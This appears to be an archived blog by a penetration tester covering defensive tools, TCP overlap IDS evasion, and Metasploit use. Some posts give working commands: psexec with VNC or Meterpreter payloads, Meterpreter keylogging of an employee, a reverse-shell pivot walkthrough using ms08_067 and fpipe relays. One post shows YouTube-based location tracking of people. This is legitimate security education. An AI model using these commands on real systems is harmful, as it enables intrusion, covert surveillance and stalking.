Welcome to In Depth Defense. In Depth Defense LLC is a privately owned Information Security Consulting company owned and operated by Mark Baggett. In Depth Defense specializes in Penetration Testing and Incident Response. At this time In Depth Defense is not accepting any new client work, but we are happy to speak to you and point you to other resources in the community.

Mark Baggett has been active in Information Security for 18+ years. I've served in a variety of roles from software developer to CISO. You can find archives of older blog entries below and read my newer posts on http://www.pauldotcom.com, http://isc.sans.edu and http://pen-testing.sans.org

Monday, February 20, 2017

New SEIM API for Phishing Domains

I released a tool to enable network defenders to find phishing and command and control domains.    This web API allows your SEIM's to identify likely malicious domains.  Check out the original posts on the Internet Storm Center.

New Incident Response Tool - SRUM-DUMP

I released an incident response/forensics tool to dump the valuable information stored in Microsoft's System Resource Utilization Monitoring database.   Check it out.

Read the original article posted here on the Internet Storm Center.

Friday, March 18, 2016

Saturday, March 12, 2016

An archive of media links / TV Interviews

On who should learn information security

TV interview after a TEDx Talk

Some footage was also used in this article:

After 40 minutes of super insightful discussion on ways to reduce your exposure to tracking they picked the MOST AWESOME quote.  (Time machine on order)  Note to self:  If you say anything goofy that will be the only thing that airs.

Tweetpaths is cool

Web Cam hacking


Augusta Cyber Security

TEDx at the Chronicle

Invisible Bears.. Yeah.  I said it.   It made sense in context.

Friday, January 8, 2016

Year in Review. 2015 Blogs, Tools, Research & Articles

Continuous Monitoring for Random Strings/DGA with freq_server.py

Detecting Randomly Generated Host Names

Is that a URL or BASE64 encoded string?

The last Security tool you will ever need.  Liam_Neeson.py
Offensive Countermeasures against Linux password theft

Crazy Sexy Hacking

Honey Hashes - Detecting Mimikatz usage:

I am the World's GREATEST Hacker video:

Spot on Podcast.__init__

Python for WMI Queries- Of course you want to do that!

SANS Orlando Brochure Challenge  - A puzzle for SANS Orlando conference

SANS Brochure Challenge write up:

Awesome Keyboard tricks- Sager/Clevo backlight controls in Powershell:

Tuesday, May 12, 2015

Awesome Keyboard Tricks - Clevo/Sager Backlight control from Powershell

I'm back on Windows.   After 8 years on a Macintosh I just couldn't go another day with ONLY 16GB of RAM.   I priced it out and for the cost of a top of the line MacBook I could get a tricked out PC with 32GB of ram and 2.5 TB or hard drive space (1.5 of it being SSD).   So I made the switch.  To get a top performing laptop I ended up buying a gaming machine from xoticpc.com.   The model is Sager NP9752 (Clevo P750ZM).    I have to say I like it quite a bit.    One of the features I was curious about was the "Programmable backlit keyboard".   With it you can set your keyboard backlight to various colors and light movement patterns.    Now, when I hear "programmable" I think APIs.   I was a little disappointed to find out there weren't any documented APIs that I could use to control the keyboard.    Your only choice is to use their built in tool to configure the lights on the keyboard.   That stinks.  I want to be able to change key colors automatically from the command line and from within my own programs.  So through a little code analysis and examination of open source Linux versions of drivers I was able to put together the following Powershell Script.


Updated link:  https://github.com/MarkBaggett/MarkBaggett/blob/master/set-kbled.ps1

After downloading and storing the script on your local hard drive you import the module into Powershell like this:

C:\PS>import-module .\set-kbled.ps1

Then you can run various options and set your keyboard lights:

C:\PS>SET-KBLED -LeftColor RED -CenterColor WHITE -RightColor Blue

Or turn the lights off


Or turn the lights back on:


Or try some of the various blinking patterns:

C:\PS>SET-KBLED -Pattern Blink

Now I can have my keyboard lights react to specific events on my event log.  I can set my laptop so that the keyboard turns BLOOD RED when I launch Metasploit or it Blinks frantically if a virus is detected.   I can have it turn blue when I play some easy listening music.  The possibilities are endless.   Do you have a Sager or Clevo compatible laptop?   Try it.  Make sure your Powershell Window is running as an administrator, import the module and try some of the commands above.   GET-HELP SET-KBLED -Full for a complete list of options.   How you enjoy it.   Now on to some real work.


Wednesday, December 10, 2014

Security Weekly Posts moved from Pauldotcom.com

You probably are aware that Pauldotcom is now Security weekly.   They guys were kind enough to move all the old posts I did for them to their new website.   Here is a list of links to articles by me on the new Security Weekly Website.


Saturday, February 23, 2013

2013 Posts and Publications

Here is a collection of blog posts and other things I did or found interesting in 2013.

Violent Python - TJ OConnor
I was the technical editor for Violent Python.

Here are some links to my 2013 Shmoocon presentation.  Unofficial sources report 1200+ people in the room for my presentation with Jake Williams.  

Here is a video: http://www.youtube.com/watch?v=R16DmDMvPeI

I also did a series on the Internet Storm Center on the topic.   Here are some posts.

Part 1 -  http://isc.sans.edu/diary/Wipe+the+drive!++Stealthy+Malware+Persistence+Mechanism+-+Part+1/15394
Part 2 -  http://isc.sans.edu/diary/Wipe+the+drive!++Stealthy+Malware+Persistence+-+Part+2/15406
Part 3 -  http://isc.sans.edu/diary/Wipe+the+drive!++Stealthy+Malware+Persistence+-+Part+3/15448
Part 4 -  http://isc.sans.edu/diary/Wipe+the+drive!++Stealthy+Malware+Persistence+-+Part+4/15460

I authored a SANS Course!   SEC573 Python for Penetration Testers.    This is awesome!

File Hiding and Process Obfuscation 
Here is a post I did on Pauldotcom.com on hiding processes.

Python PSEXEC rocks

Manipulate Volume Shadow Copies from Python

SMB Relay Demystified and NTLMv2 Pwnage with Python

TDS, MSSQL and Python

Antivirus Evasion - A peak under the Veil

Windows is 0wned by Default! 
Well.  This is pretty scary stuff.  Rootkits without Rootkits.  AV Evasion.   My latest research project hit some serious pay dirt here.    Sitting in Jason Fossen's SEC505 Securing Windows class is always inspiring and educational.   Two years ago I was watching him play with the Application Compatibility Toolkit.   I commented that it looked a lot like a rootkit.   Jason (one of the smartest guys I know) said, "Yep, I think there is probably a lot of things you could do with that."   Jason is awesome.  I dug into it for a while, shared it with a few friends, then presented it publicly at this years Derbycon!   Check it out.


Wednesday, May 23, 2012

Stuff I worked on in 2011 & 2012

I suppose I should update this site more often... So much to hack; so little time.   Here is some of the public stuff I have been working on in 2011, 2012.

Grabbing Usernames, Passwords, Cookies and more from HTTPS websites

Privilege Escalation through VMWare snapshots

Using Windows Resource Monitor to find hackers

A great SCAPY shortcut for TCP Fussing

Python Shells:
One liners:
Put Meterpreter in Python for 100% evasion:

Cool new SQL Injection Tool - It is different!

Volume Shadow Copy, Symbolic Links and directory name craziness
Execute files up to a month after they have been deleted and "cipher /w" wipes them:
Other related stuff:

EAP MD5 Crack - Attack 802.1X

Packet Reassembler for a new IDS ANALYST evasion technique

Convert Iphone Backup to Google Maps & Dump other data

Thursday, January 14, 2010

Some new posts

I've gotten a couple emails asking where I went. For those that do not know I've been posting on Pauldotcom.com. In the future I will post my entries here also, but really... You should follow pauldotcom.com!!!! :) See you there.

Wireless Access Points Defcon 2004 style

GINA Authentication Bypass

Shmoocon tickets. See you there!

All your Active Directory Computer objects - Gone in 60 seconds

Wednesday, November 25, 2009

Authentication Bypass in Gina Replacements.


Wednesday, November 4, 2009

Layer 1 Port knocking

Maybe not, but its pretty cool!

Sunday, August 16, 2009

TCP Fragment Evasion

Originally posted on http://pauldotcom.com/2009/08/tcp-frament-evasion-attacks.html

By: Mark Baggett

I recently read a very good article on tuning Snort's Stream5 preprocessor to avoid "TCP Fragment Overlap" attacks. It's a great article, but the wording confused me. I thought to myself, "TCP Fragments, that must be a mistake. The TCP Header doesn't have a 'more fragments bit', a 'fragment offset' or anything to support fragmentation. How can there be any TCP fragments?"   Typically when we talk about fragmentation attacks we think about Layer 3 attacks. Attackers manipulate the IP packet headers to pull off various insertion and evasion attacks. Examples of layer3 attacks include overlapping fragment attacks and temporal evasion (host reassembly timeout evasion). These attacks are explained pretty well in an article titled "Evading NIDS, revisited".

So what is TCP or Layer 4 "fragmentation"? Really, its overlapping or retransmitted datagrams with the same TCP Sequence number. To demonstrate the concept I fired up a virtual machine running Backtrack 3. I ran a netcat listener on my host (nc -l -p 9000) and used a netcat client in backtrack to connect to it. I fired up wireshark to watch the packets and I transfered the text "This is a test of the emergency broadcast system. If it were an actual emergency" between the two hosts. This is what Wireshark captured.

Figure #1


View image

Perfect. Exactly what we would expect. Since my packet doesn't exceed the MTU of the established TCP connection a single packet is transfered to the client with a single acknowledgment in return.  If it had exceeded the MTU it still wouldn't have fragmented. It would have sent more than one datagram, each with its own unique IP ID.

Then I created a fragroute configuration file with one line in it:

tcp_seg 16

This will cause fragroute to break the packets down so that they can only carry 16 bytes of TCP traffic. I start fragroute (fragroute -f ~/myfrag.conf and transfer the same text between the hosts...

Figure #2


View image

Fragroute works as expected and breaks the packets down such that only 16 bits of data can be transfered in each packet. Each packet sequence number increases by the number of bytes transmitted. Sequence numbers increase in order. Also, notice that each packet has its own unique IP ID field. There is NO FRAGMENTATION. The "More Fragments bit" isn't set.   The fragment offset isn't set. No fragments. Instead, fragroute is transferring packets as if the MTU of the segment is only enough for 16 TCP bytes.

So now lets do some "tcp fragmentation overlaps". I change my fragroute.conf file to say this:

tcp_seg 16 new

This will cause fragroute to transmit frames with overlapping sequence numbers.   This attack takes advantage of the fact that the TCP layer doesn't pass data up the stack to the application until it has acknowledged the data and that packets are acknowledged in sequential order.    So if we skip datagram #3  and transmit datagrams #4, #5 and #6, duplicates of #4 and overlaps of #5 and #6 then the TCP stack needs to hold datagrams #4,#5 and #6 (as long as they are within the window size) and figure out what to do with duplicates/overlaps once it receives fragment #3.

To see this in action I fire up fragroute and retransmit the text "This is a test of the emergency broadcast system. If it were an actual emergency"  

Figure #3


View image

Lets look at it in the fragroute packets in figure#3.   The first two datagrams (#1 and #2) are garbage.  Their payload is random junk.  Then fragroute transmits good data in packets 4 and 5.  The payload here is the end of our payload "If this had been an actual emergency."  After the 4th packet the receiving host begins screaming to the transmitting client "HEY DUDE,  ACK 2933750986.  I didn't get that one yet".   The receiving TCP stack is complaining about not receiving the first datagram.    Then fragroute sends 2 packets with 32 TCP bytes in each.  These two datagrams include the  FIRST datagram (Notice packet #10 has the lowest sequence number and the embedded text payload).  Parts of these two packets overlap packets 1 and 2. Packet #9 overlaps 16 bytes of packet #2.  16 bytes of packet #10 overlap packet #1.  If the TCP reassembly engine favors NEW packets then it will reassemble the text as expected.  If the IDS reassembles the packets favoring the OLD packets then we can bypass the IPS. If we were drawing analogies to layer three fragment attacks holding the low sequence number datagrams is equivalent to setting the "more fragments bit" and the sequence number is the equivalent to the fragment offset. So how to fix this?  The attacks aren't new.  Snort has the STREAM5 preprocessor.  Just be sure that you tune STREAM5 just like your FRAG3 preprocessor.  


Snort's Stream5 and TCP overlapping fragments An article by Richard Bejtlich that sparked my interest in this topic. Its a very good article with more explanation on tuning the snort preprocessor.

Sunday, June 28, 2009

Posts moving to PaulDotCom

I'm joining the guys at Pauldotcom. They have invited me to post my blog entries on their site. As posts go up on their site I'll provide a link to them here and I'll post some less technical notes here. I'm pretty excited about the opportunity to work with those guys and looking forward to it.

Friday, May 22, 2009

Don't forget to wipe!

A while back I assisted the FBI in the collection of evidence of a now convicted sexual offender. The guy had a hard drive full of child porn. My customer had suspicions that an employee in a remote office was accessing inappropriate material on their work computer and asked that I investigate it remotely. After finding one photo of a very young girl among a collection of "normal" porn and discussing it with my customer, I immediately dial my contact with the FBI. (Good contacts are ESSENTIAL don't wait until you need them to try and make them.) Although the young girl was clothed in the picture I saw, the lingerie and pose she was in was very disturbing and you just knew you didn't want to see anything else. At that point I froze; anything else that was touched remotely was altering and potentially destroying evidence on the remote drive. Within an hour the FBI was at the office. He used my machine and the access I had gained to briefly verify the contents of the drive and confirm that it required additional investigation. It did and they dispatched local agents to grab the drive for proper forensic collection.

I spared myself the imagery and let the FBI do what it needed to do using my machine. To me, this story is very interesting. Here a person in a very similar role as the one I played. He could be prosecuted for any residual images left behind on his drive after an investigation.


As far as I know, no CP was ever copied to my hard drive. I had donated a thumbdrive to the cause where all the evidence they needed during that brief investigation was collected. If it is a project I am working on with sensitive data (such as a penetration test) I like to keep everything in TrueCrypt volume making clean up very easy. But in this case, I wasn't driving. It was a windows box and I periodically run "CIPHER /W:C:\" to clean up all the residual files in the free space on the drive, but it’s not something I do religiously. How about you? Well, Cipher is running NOW!

Tuesday, April 28, 2009

Good enough Compliance??

Check out this article..


What is "Good enough Compliance?" You either ARE complaint or you ARE NOT. Its a switch. The article should be a guide to "Good enough security". Good security is no the same a being compliant. I would much rather have good security then being compliant with any given regulation. But good security often covers many of the security requirements outlined in compliance standards. Two things caught came to mind reading the article.

1) Don't trust Sony Pictures with any personal data or credit card information.
2) How many data breaches are REALLY happening?

What does this paragraph suggest?
"According to Behnam Dayanim, a privacy attorney with Paul, Hastings, Janofsky & Walker, state security breach notification laws are among the most frequently ignored types of security regulation. About 35 states have passed security breach notification laws, which lay out, to varying degrees, when an enterprise needs to notify customers and clients if their private information may have been exposed to an unauthorized user. According to CIO and PricewaterhouseCoopers’ “The Global State of Information Security 2006” survey, 32 percent of U.S. organizations admit to not being compliant with state privacy regulations."

According to this paragraph 32% of organizations admit to not being compliant with state privacy laws. The only way to be non-compliant with those laws is to have a breach and not disclose it properly right? That is a significant number of unreported breaches.

Well, at least Myspace did the right thing this past April. Check out their disclosure on April 16th, 2009.

Thursday, April 23, 2009

Interesting story on US Cyber attack

"Just after midnight on Thursday, April 9, unidentified attackers climbed down four manholes serving the Northern California city of Morgan Hill and cut eight fiber cables in what appears to have been an organized attack on the electronic infrastructure of an American city. Its implications, though startling, have gone almost un-reported."


Wednesday, April 15, 2009

Snort 3.0 SANS Paper

Here is a great SANS GCIA Gold paper for anyone interested in Snort 3.0. Doug also created a very nice bootable live cd with Snort 3.0, Sguil, and other tools from the 503 track. Check him out at http://securityonion.blogspot.com.


Monday, March 23, 2009

No exploit Metasploit usage - VNC and Keylogging

OK.  I admit it.  I use metasploit at work.  Of course, I have permission to use it as a penetration testing tool, but I find it to be very useful in other circumstances as well.    I often use the PSEXEC "exploit" to provide username and password to fully patched machines for administrative purposes.   For example, it has come in handy when the standard remote access tools have been removed and there is a remote machine that the support center is unable to access.   They, rightly so,  have figured out that if the security team can get in to their machines without usernames and passwords, it should be pretty easy for them to help recover a managed machine with known usernames and passwords.   One option to troubleshoot the broken admin software is to remotely (and temporarily) install VNC on the stranded host.  I use to connect to the remote c$ with administrator credentials, copy up vnc, import the required registry keys, start the server, fix the problem, clean up the registry, clean up the files and kill the service.  Now I just do this..

./msfcli windows/smb/psexec smbuser=myadminacct smbpass=mypassword smbdomain=companydomain rhost=strandedmachineip payload=windows/vncinject/bind_tcp E

There is no clean up because the tools never reaches the disk of the remote machine.  This is very nice.  Doug Burks and I have even talked about stripping down ./msfweb to a barebones version that just ask for ip, username and password and launches the VNC session.   ./msfwebvnc could be wrapped around a msfd instance on a central server that allows the support center to recover machines.    We may do that some day.   Comment if that interests you.   Now meterpreter has introduced another feature I suspect I will use at work.   

I occasionally get asked to run a keylogger on an employees machines.  Meterpreter now has this functionality built into it.   Before you do this talk with HR and your legal team.   In my opinion no employee investigations should ever occur without HR's involvement.  Maybe its because wiretap laws make me nervous about using my KeyGhost logger, but anytime I'm dealing with keyloggers I like to talk with our lawyers.  I've been told its not a problem many times before, but I check with them first.  Meterpreter on the other hand is software and there is no "wire tapping" going on.   It should be much less intrusive and your less likely to have the employee notice it.   Ask me to tell you the horror story about the USB keylogger and the KVM system some time.    Also, I can use meterpreter to keylog a remote office in only a few seconds.   So now a keylogger on a remote system is as easy as:

./msfcli windows/smb/psexec smbuser=myadminacct smbpass=mypassword smbdomain=companydomain rhost=monitoredmachineip payload=windows/meterpreter/bind_tcp E
[*] Please wait while we load the module tree...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened ( ->

meterpreter > grabdesktop

Trying to hijack the input desktop...

meterpreter > keyscan_start

Starting the keystroke sniffer...

meterpreter > keyscan_dump

Dumping captured keystrokes...

 I'm so glad we use this encrypted im channel to exchange sensitive data so the company doesn't catch us.   The stolen data is...

meterpreter >keyscan_stop

Interestingly, the keylogger does not capture the usernames and passwords when the user enters them at the screen saver logon prompts.   It records ctrl-alt-delete but not the password.   This is actually a good thing from my intended use.   Not knowing employees passwords protects the integrity of our audit logs.   

Sunday, March 22, 2009

Metasploit adds new keylogger and Mac payloads

Metasploit added some pretty interesting payloads to its arsenal this week.   First, Meterpreter (the only payload you'll ever need) added a keylogger.  Plus, they have added some cool payloads for the Mac.   There are a set of isight payloads that will snap a picture from the isight camera (bind_tcp, reverse_tcp, etc).   This payload is an part of the "bundle inject" payload which are documented in the Mac OS X hackers handbook  this looks like it could be the beginning of a meterpreter like plug-able payload for OSX.    Charles Miller, winner of the new Macintosh Powerbooks at both the 2008 and 2009 Pwn2Own contests is coauthor of the payloads along with Dina Dia Zovi.   That is definitely a book I will be adding to my library.   Here is a recent presentation with some interesting information on the payloads.

Saturday, March 21, 2009

SANS 504 - Hacking Techniques, Exploits and Incident Response Augusta, GA

I'm going to mentor another SANS 504 session this fall.  Hacking Techniques, Exploits and Incident response is one of my favorite SANS classes.   This is my third mentor session and my second time running 504.   Last year SANS gave me the Mentor of the year award so they are giving me some additional flexibility in the mentor format.    This time we are running a modified mentor format.  We will have 13 more hours of class time than the normal mentor session.   That's more time for covering the materials and doing exercises.  If your interested get full details and sign up here.   Greater Augusta ISSA members contact me for a very special discount code.   

Sunday, February 15, 2009

Using the free AlienVault.com Nessus feed on your Mac

Tenable has changed their license and you can no longer use their vulnerability feeds for commercial use.   Alienvault.com has a free nessus feed you can subscribe to.  It is available for use here.   You will notice two update programs there.  One for Unix and one for Windows.   What about the MAC?   To subscribe the nessus feeds on your macintosh do this:

1) Download the linux update script.
2) Update it so it works on your MAC as described below.

First, in the "#Plugin dir" section you will need to to change the line that reads:


3) chmod +x alienvault-feed-sync.sh

If you run the script by typing :

./alienvault-feed-sync.sh  nessus 

you will see an error about not being able to find the command "md5sum".   The nessus feed update did work, but the script was unable to compare the hashes to verify it completed successfully.   That might be good enough for you and you can go about using your updated feeds.   BUT,  I want to see that those hashes match.   Really, it is not buying me much security because I'm downloading the "md5sum" file that I am using for comparison from the same location as the files, but its still a good integrity check.   To fix it, you might waste your time as I did and change "findcmd md5sum" in the update script to "findcmd md5" since MD5 is the name of the MD5SUM utility on OS X.   But if you do you will get the following error:

"Error: md5sums not correct. Your NVT collection might be broken now."

Why?  The version of default version of MD5  that comes with the OS doesn't support the --check (-c) option.    For the file check to work you will want to install the version of md5 that is installed on most linux distributions.  It is called md5sum and it is available for install through fink.   

Happy bug hunting.

Wednesday, February 4, 2009

Reverse Pivots with Metasploit - How NOT to make the lightbulb

In a penetration test your target is PII kept on a corporate file server which I will call Victim2. You are outside the firewall but have gained access to an internal host, Victim1, when a user opened your word document with an embeeded Meterpreter payload. The stager embedded in the word document made a REVERSE_TCP connection to your machine which uploaded metsrv.dll to the victim. The machine you have access to (Victim1) has unfiltered access to your target (Victim2). Victim2 is vulnerable to ms08_067_netapi. Victim2 however, has NO access to the internet at all. Were it not for the strict egress firewall rules controlling Victim2 you could have used the ROUTE command to pivot your attack through your meterpreter session on Victim1 to Victim2, and have Victim2 send you a shell directly like this...

Your IP =
Victim1 =
Victim2 =

Background session 1? [y/N] y
msf exploit(ms08_067_netapi) > route add 1
msf exploit(ms08_067_netapi) > route print

Active Routing Table

Subnet Netmask Gateway
------ ------- ------- Session 1

msf exploit(ms08_067_netapi) > sessions -l

Active sessions

Id Description Tunnel
-- ----------- ------
1 Meterpreter ->

msf exploit(ms08_067_netapi) > set RHOST
msf exploit(ms08_067_netapi) > set LHOST
msf exploit(ms08_067_netapi) > exploit

And the session would be shoveled back to you from Victim2. BUT, this time, strong egress filters prevailed and you can't make that direct connection. So you decide to relay in back through Victim1 who does have access to the internet. How do you do that?

Here was my first thought. I'll use meterpreter's PORTFWD command on VICTIM1 to setup a TCP relay and back to me. Then I'll exploit Victim2 and set my LHOST to Victim1 ( and my LPORT to the PORTFWD listener on Victim1. My attack will flow through my pivot and return to me via the PORTFWD on Victim1.

Guess what. You can't do that. LHOST and LPORT have to be a valid IP address on your host or the exploit wont even launch. Metasploit won't let your LHOST be the Victim1. Maybe I could do some CHOST,CPORT trickery (see the advanced options)? I couldn't make that work either.

OK so I can't launch an exploit. But I can make one!
./msfpayload windows/meterpreter/reverse_tcp LHOST=victim1 LPORT=portfwd listener X > custompayload.exe

Then I can use the Upload and Execute payloads to exploit victim2 and get my shell!!
Nope. That doesn't work either. Why? I think there is a bug in PORTFWD.

When you run portfwd and don't provide the OPTIONAL -L ip address it appears to work. You get something like this..

meterpreter > portfwd add -l 6666 -r -p 80
[*] Local TCP relay created: <->

But nothing is listening on port 6666. A quick "execute -c -f cmd.exe; interact 1; netstat -na" shows nothing listening on the port. An NMAP of the host confirms no listener...

Macintosh:~ mark.baggett$ nmap -p 6666

Starting Nmap 4.76 ( http://nmap.org ) at 2009-02-03 22:47 EST
Interesting ports on
6666/tcp closed irc

Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds
Macintosh:~ mark.baggett$

If I try to force the matter with a -L I get a nasty "Cant assign requested address" message.

meterpreter > portfwd add -L -l 6666 -r -p 80
[-] Error running command portfwd: Can't assign requested address - bind(2) /Applications/framework3/lib/rex/socket/comm/local.rb:138:in `bind'/Applications/framework3/lib/rex/socket/comm/local.rb:138:in `create_by_type'/Applications/framework3/lib/rex/socket/comm/local.rb:26:in `create'/Applications/framework3/lib/rex/socket.rb:45:in `create_param'/Applications/framework3/lib/rex/socket.rb:52:in `create_tcp'/Applications/framework3/lib/rex/socket.rb:59:in `create_tcp_server'/Applications/framework3/lib/rex/services/local_relay.rb:184:in `start_tcp_relay'/Applications/framework3/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb:219:in `cmd_portfwd'/Applications/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `send'/Applications/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'/Applications/framework3/lib/rex/post/meterpreter/ui/console.rb:94:in `run_command'/Applications/framework3/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'/Applications/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `each'/Applications/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'/Applications/framework3/lib/rex/post/meterpreter/ui/console.rb:60:in `interact'/Applications/framework3/lib/rex/ui/text/shell.rb:123:in `call'/Applications/framework3/lib/rex/ui/text/shell.rb:123:in `run'/Applications/framework3/lib/rex/post/meterpreter/ui/console.rb:58:in `interact'/Applications/framework3/lib/msf/base/sessions/meterpreter.rb:181:in `_interact'/Applications/framework3/lib/rex/ui/interactive.rb:48:in `interact'/Applications/framework3/lib/msf/ui/console/command_dispatcher/core.rb:918:in `cmd_sessions'/Applications/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `send'/Applications/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'/Applications/framework3/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'/Applications/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `each'/Applications/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'/Applications/framework3/lib/msf/ui/console/command_dispatcher/exploit.rb:143:in `cmd_exploit'/Applications/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `send'/Applications/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'/Applications/framework3/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'/Applications/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `each'/Applications/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'/Applications/framework3/lib/rex/ui/text/shell.rb:127:in `run'./msfconsole:82
meterpreter > ipconfig

Parallels OEM Adapter.
Hardware MAC: 00:1c:42:99:40:22
IP Address :
Netmask :

OK. So maybe there is a bug in portfwd. I punt and I use a different external TCP relay program. I upload and execute FPIPE.EXE and use it on Victim1 to relay the session from Victim2 back to My IP.

fpipe.exe -i -l 5555 -r 80

[*] Handler binding to LHOST
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.

And thats it! Its all good with one VERY IMPORTANT exception. I never get
[*] Meterpreter session 2 opened.

So FAIL, FAIL FAIL. I was unable to pivot a reverse_tcp meterpreter session. I can reach my goal by using the Meterpreter session on Victim1 to access the file server on Victim2 with SMB ports, but thats not very sexy. Ed Skoudis gender bender netcat relays are a good option, but I want to do it with just metasploit. So what is the right way to do this? Do you know? Add a comment!

Wednesday, January 28, 2009

I know where you live... or at least google does

Can you use YouTube.com to find out where a video was uploaded? I’m not saying you can. I’m not saying you can’t. But I think it is interesting to try. Using the following method YouTube has led me to the homes of a few people I know. Does it work for you??

Start with YouTubes “Advanced Search”.


Click “Advanced Options” and “Show Map”. Type in the userid of the person your trying to location and click the SEARCH box inside the advanced search box (not the one at the top). If the video is in the circle it will be displayed in the result. If not you will see “No Videos found for xyz” and a playlist for the user you are searching for. The difference between a hit/no hit is subtle. Do a search for something you know is geoencoded so you can see the differenece. As a rule, if you see this then the video is not in the circle.

No videos found for “USERXYZ”
Playlist Results for USERXYZ

Zoom in one click at a time making your circle smaller and smaller to see if the video is still in the circle. If search results disappears, its no longer in the circle. Using this method you could take the search down to a city block or so. Then you can switch to http://maps.google.com/ and enable the YouTube overlay. You may find the video is places directly on top of the house where it was uploaded. But a video overlay only appeared in 1 out of the 6 times that I tried to narrow down to a street. It looks like the youtube overlays of Google maps doesn't have as much data as the map search on youtube.

I tested it with 3 video’s where I knew the target street address and in all 3 cases was able to locate their street. In one of the three cases the Google maps overlay displayed the YouTube video on top of the correct house. In one other case I narrowed down a video to a street, but when I asked the account owner about the address he had no idea how that address related to his video although it was within a few miles of his house. There were several cases where I couldn’t get YouTube to return any Geo-encoded video’s on that users account. Its not science, but here is some interesting data being revealed by that search.

UPDATE 1-31:  It appears that in the test case where the video led me to a strange location several miles from the account owners home, the video may have been tagged to the geographic center of the zip code of  the uploader.   This is going to be a significant stumbling block for any open source youtube geotagging missile guidances system projects resulting from this ground breaking research.